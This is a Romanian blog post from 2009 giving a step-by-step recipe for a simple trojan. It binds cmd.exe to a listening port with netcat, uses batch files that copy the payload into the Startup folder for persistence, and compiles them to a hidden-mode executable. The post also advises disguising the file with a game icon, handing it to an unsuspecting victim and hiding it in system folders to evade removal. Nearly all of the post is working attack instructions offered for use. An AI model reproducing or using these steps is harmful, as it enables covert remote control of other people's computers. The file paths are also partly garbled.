Va voi prezenta in cele ce urmeaza o metoda relativ usoara pt a face un trojan
MAI intai trebuie sa faceti rost de doua programe
1)nC.exe (net capture)-----------cred ca stie toata lume ce face!!! nu mai e cazul sa explic .
2)Quick Batch File----------------Transforma un fisier cu extensia bat in unul cu extensia exe ,si cel mai important
are o optiune care permite rulare fisierelor in hide mode
Boon si acum sa incepem . luam un folder si bagam in el nC.exe Porgramul nC.exe poate face un shell la CMD folosind
un port ales de noi.Asta o facem cu :
nc -l -p PORT-ul -d -e cmd.exe
iar apoi ne conectam la computer folosind comanda Telnet IP port (exemplu telnet 54.76.21.34 2000 )
ori putty; care il vreti mie sincer imi place mai mult putty
Daa... toate bune si frumoase in schimb ne izbim de o mare problema folosind comanda nc -l -p PORT-ul -d -e cmd.exe
nu e puem conecta de mai multe ori asfel dupa fiecare conectare portul este inchis automat !! cea ce nu este bine de aceea
folosim un mic artificiu sa facem un program care sa imi permita sa ma pot connecta de mai multe ori la computerul victimei
in folderul de care spuneam mai devreme punem doua fisiere care au extensia bat.Iar apoi incepem sa le scriem asfel ;
Doua fisiere
1)Start.bat
2)System.bat
In fisierul Start.bat scriem :
copy nc.exe c:windowstemp
copy System.exe c:windowstemp
c:
cd
cd "Cocuments and SettingsAll UsersStart MenuProgramsStartup"
copy c:windowstempSystem.exe
System.exe
Ce face acest program ?! Simplu copie cele doua fisiere in c:windowstemp si apoi copie un singur fisier (system.exe)in Cocuments and SettingsAll UsersStart MenuProgramsStartup
Boon assta inseamna ca de fiecare data cand ala aprinde calc i se va executa automat System.exe dar ce e asa de important D`le fisieru asta?!
Smplu System.exe are urmatoarele line
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
.................................................. ..........................................
de mai multe ori !!de vreo 100 de ori !
dupa aia fisierul System.bat il compilam cu Quick Batch File si avem un fisier System.exe
ATENTIE!!! trebuie a aiba optiunea HIDE MODE activa!!! pt ca executarea a se faca ascnus fara ca victima sa vada!!
daca vreti si sunteti mai luxosi puteti sa compilati si START.bat si sa ii schimbati pictograma in ua rmoasa de la un joc de ex si ii dati la un lamer si gata!
Avantaje e mic are 352 Kb nu il vede nici un antivirus si nici nu il va vedea vreodata cred
Nu imi ausm nici un fel de responsabilitate pt fatele savarsite de d-voastra in urma ciiri acestui articol !!!
As mai adauga ceva, si anume locul in care se pune fisierul. C:windowstemp nu e locul potrivit pentru ca un user care are cat de cat habar stie ca e bine sa stergi fisierele temporare din cand in cand. Ar fi mult mai sanatos sa se puna in C:windowssystem32 sau in program files in directorul unui program folosit care sigur nu il sterge (AV-ul, YM etc).
vineri, 30 octombrie 2009
Cum sa faci un fel de Trojan
Scris de ADMIN la 20:56:00
Abonați-vă la:
Postare comentarii (Atom)
0 comentarii:
Trimiteți un comentariu